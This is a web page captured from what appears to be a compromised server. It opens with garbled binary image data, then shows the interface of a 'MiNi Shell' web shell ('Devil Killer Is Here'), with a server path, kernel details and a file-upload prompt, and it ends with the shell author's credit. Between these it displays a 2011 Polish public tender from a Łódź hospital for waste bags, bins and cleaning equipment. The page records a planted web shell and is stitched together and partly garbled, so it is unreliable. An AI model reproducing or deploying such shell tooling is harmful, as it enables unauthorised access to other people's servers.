JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110304/73653-N-2011.html

<p class="kh_header"><b>Łódź: dotyczy:	postępowania o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości nie przekraczającej równowartości kwoty 193 tys. EURO  na dostawy worków polietylenowych na odpady, pojemników na odpady i segregację odpadów oraz sprzętu do sprzątania dla W.S.S. im. M.  Kopernika w  Łodzi.</b><br>
<b>Numer ogłoszenia: 73653 - 2011; data zamieszczenia: 04.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dotyczy:	postępowania o udzielenie zamówienia publicznego w trybie przetargu nieograniczonego o wartości nie przekraczającej równowartości kwoty 193 tys. EURO  na dostawy worków polietylenowych na odpady, pojemników na odpady i segregację odpadów oraz sprzętu do sprzątania dla W.S.S. im. M.  Kopernika w  Łodzi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1 - Worki polietylenowe na odpady: 1).worki polietylenowe (czerwone) 23 x 50,szt. 24 000
2). worki polietylenowe (czerwone) 50 x 60, szt. 111 000
3). worki polietylenowe (niebieskie) 50 x 60, szt. 1 000
4). worki polietylenowe (czarne) 50 x 60, szt. 164 000
5). worki polietylenowe (czerwone) 70 x 110, szt. 106 000
6). worki polietylenowe (czarne) 70 x 110, szt. 126 000
7). worki polietylenowe (niebieskie) 70 x 110, szt. 1 000
8). worki polietylenowe (białe) 70 x 110, szt. 10 000
9). opaski zaciskowe do zamykania worków dł. 150 mm/szer. 3 mm,  szt. 200 000

PAKIET 2 - Pojemniki na odpady i segregację odpadów:
1). Pojemniki plastikowe o pojemności 80 litrów z pokrywą hermetyczną (średnica ok. 45 cm wys. ok. 80 cm),	szt. 25
2). Pojemniki plastikowe o pojemności 30 litrów z pokrywa hermetyczną,	szt. 400
3). Wiadra pedałowe o poj.12 - 15 litrów z tworzywa sztucznego z pokrywą, szt. 360
4). Pojemnik o pojemności 50 l. z tworzywa sztucznego przeznaczony do selektywnej zbiórki odpadów, do zastosowania na zewnątrz i wewnątrz budynków, wyposażony w zaczepy, klipsy zabezpieczające oddzielenie pokrywy od kosza, z pokrywą typu push wyposażoną w system sprężynowy.  Kolory pojemników:  ZIELONY, NIEBIESKI , ŻÓŁTY ,CZERWONY, Do  każdego pojemnika nalepka określająca rodzaj odpadu,  szt.	30
5). pojemniki na zużyte igły o poj. 2 litry, żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny, szt.	15 000
6). pojemniki na zużyte igły o poj. 1 litr, żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny,szt.	12 000
7). stojaki na worki z odpadami o wielkości 70 x 110 cm. Stojaki z pokrywą z tworzywa sztucznego przeznaczone do selektywnej zbiórki odpadów wewnątrz pomieszczeń szpitalnych, szt.	25
8). pojemniki plastikowe o pojemności 10 litrów z pokrywa hermetyczną, szt.	4 500
9). pojemniki na zużyte igły o poj. 0,5 litra, żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny,szt.	1 500
10). Pojemniki z tworzywa sztucznego z uchylną pokrywą mobilne, na kółkach o pojemności 110 - 130 litrów, szt. 15
11). pojemniki plastikowe o poj 60l z pokrywą, szt. 300

PAKIET 3 - Sprzęt do sprzątania:
1). Ścierki do dezynfekcji powierzchni i sprzętu NIEBIESKIE,	szt. 1 360
2). Ścierki do dezynfekcji powierzchni i sprzętu ZIELONE, szt. 1 150
3). Ścierki do dezynfekcji powierzchni i sprzętu ŻÓŁTE	, szt.	500
4). Ścierki do dezynfekcji powierzchni i sprzętu CZERWONE,	szt. 500
5). Mopy płaskie,	szt. 1 950
6). Wózek / Zestaw sprzątający, kpl. 25

PAKIET 4 - Zestaw do mycia okien:
1). Kije teleskopowe, szt.21
2). uchwyty myjki do szyb o szerokości 35 cm,	szt. 21
3). uchwyty myjki do szyb o szerokości 45 cm,	szt. 4
4). myjki do szyb z mikrofazy z rzepem o szerokości 35 cm,	szt. 92
5). myjki do szyb z mikrofazy z rzepem o szerokości 45 cm,	szt. 10
6). uchwyt ściągacza do szyb, szt.	25
7). ściągaczka z metalową listwą i wymienną gumą o szerokości 35 cm,	szt. 56
8). ściągaczka z metalową listwą i wymienną gumą o szerokości 45 cm,	szt. 40

PAKIET 5 - Pojemik na igły:
1).Pojemnik plastikowy na zużyte igły do biopsji, szt. 35.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia Wykonawcy, z którym podpisze umowę na realizację niniejszego zamówienia, zamówień uzupełniających przewidzianych w art. 67 ust. 1 pkt. 7 ustawy PZP, w trybie wolnej ręki, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na rozszerzeniu dostawy, jeżeli zmiana Wykonawcy powodowała będzie konieczność nabywania rzeczy o innych parametrach, co powodowałoby niekompatybilność techniczną lub nieproporcjonalnie duże trudności w użytkowaniu przez Zamawiającego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6, 19.52.00.00-7, 39.22.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania spełniania tego warunku zostanie dokonany na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania spełniania tego warunku zostanie dokonany na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania spełniania tego warunku zostanie dokonany na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania spełniania tego warunku zostanie dokonany na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania spełniania tego warunku zostanie dokonany na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a.) Próbki zaoferowanych przedmiotów zamówienia, oryginalnie zapakowane wraz z etykietą producenta i oznaczone numerem pakietu i pozycji oraz nazwą Wykonawcy. Zamawiający wymaga złożenia: 
- w pakiecie nr 1 (worki polietylenowe na odpady) dla pozycji 1, 2, 3, 4, 5, 6, 7, 8, 9 - po 20 szt. produktu z każdej z wyżej wymienionych pozycji.  
 
b.) Posiadane   katalogi, foldery, opisy przedmiotu zamówienia od producenta, potwierdzające  spełniania parametrów  wymaganych w SIWZ ( załącznik nr 2  do SIWZ),
 - w pakiecie nr 3 i 4 dla wszystkich pozycji.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W.S.S. im. M. Kopernika w Łodzi, ul. Pabianicka 62, Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2011 godzina 10:00, miejsce: W.S.S. im. M. Kopernika w Łodzi, KANCELARIA SZPITALA, ul. Pabianicka 62.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1 - Worki polietylenowe na odpady.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. worki polietylenowe (czerwone) 23 x 50, szt.	24 000
2. worki polietylenowe (czerwone) 50 x 60, szt.	111 000
3. worki polietylenowe (niebieskie) 50 x 60, szt.	1 000
4. worki polietylenowe (czarne) 50 x 60, szt. 164 000
5. worki polietylenowe (czerwone) 70 x 110, szt. 106 000
6. worki polietylenowe (czarne) 70 x 110,	szt. 126 000
7. worki polietylenowe (niebieski) 70 x 110, szt.	1 000
8. worki polietylenowe (biały) 70 x 110, szt. 10 000
9. opaski zaciskowe do zamykania worków dł. 150 mm/szer. 3 mm	szt.	200 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 19.52.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - Pojemniki na odpady i segregację odpadów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pojemniki plastikowe o pojemności 80 litrów z pokrywą hermetyczną (średnica ok. 45 cm wys. ok. 80 cm),szt. 25
2. Pojemniki plastikowe o pojemności 30 litrów z pokrywa hermetyczną,	szt. 400
3. Wiadra pedałowe o poj.12 - 15 litrów z tworzywa sztucznego z pokrywą, szt. 360
4. Pojemnik o pojemności 50 l. z tworzywa sztucznego przeznaczony do selektywnej zbiórki odpadów, do zastosowania na zewnątrz i wewnątrz budynków, wyposażony w zaczepy, klipsy zabezpieczające oddzielenie pokrywy od kosza, z pokrywą typu push wyposażoną w system sprężynowy.  Kolory pojemników:  ZIELONY, NIEBIESKI , ŻÓŁTY ,CZERWONY, Do  każdego pojemnika nalepka określająca rodzaj odpadu,  szt.	30
5. pojemniki na zużyte igły o poj. 2 litry, żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny, szt.	15 000
6. pojemniki na zużyte igły o poj. 1 litr, żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny, szt.	12 000
7. stojaki na worki z odpadami o wielkości 70 x 110 cm. Stojaki z pokrywą z tworzywa sztucznego przeznaczone do selektywnej zbiórki odpadów wewnątrz pomieszczeń szpitalnych, szt.	25
8. pojemniki plastikowe o pojemności 10 litrów z pokrywa hermetyczną, szt. 4 500
9. pojemniki na zużyte igły o poj. 0,5 litra, żółte z czerwoną pokrywą i nalepka oznaczajacą odpad medyczny, szt.	1 500
10. Pojemniki z tworzywa sztucznego z uchylną pokrywą mobilne, na kółkach o pojemności 110 - 130 litrów, szt. 15
11. pojemniki plastikowe o poj 60l z pokrywą, szt. 300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - Sprzęt do sprzątania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ścierki do dezynfekcji powierzchni i sprzętu NIEBIESKIE, szt. 1 360
2. Ścierki do dezynfekcji powierzchni i sprzętu ZIELONE, szt. 1 150
3. Ścierki do dezynfekcji powierzchni i sprzętu ŻÓŁTE,	szt. 500
4. Ścierki do dezynfekcji powierzchni i sprzętu CZERWONE, szt. 500
5. Mopy płaskie, szt. 1 950
6. Wózek / Zestaw sprzątajacy, kpl. 25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - Zestaw do mycia okien.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kije teleskopowe, szt. 21
2. uchwyty myjki do szyb o szerokości 35 cm, szt. 21
3. uchwyty myjki do szyb o szerokości 45 cm, szt.4
4. myjki do szyb z mikrofazy z rzepem o szerokości 35 cm, szt.92
5. myjki do szyb z mikrofazy z rzepem o szerokości 45 cm, szt.10
6. uchwyt ściągacza do szyb,	szt. 25
7. ściągaczka z metalową listwą i wymienną gumą o szerokości 35 cm, szt. 56
8. ściągaczka z metalową listwą i wymienną gumą o szerokości 45 cm, szt. 40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.22.40.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5 - Pojemnik na igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik plastikowy na zużyte igły do biopsji,	szt. 35.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.92.84.80-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com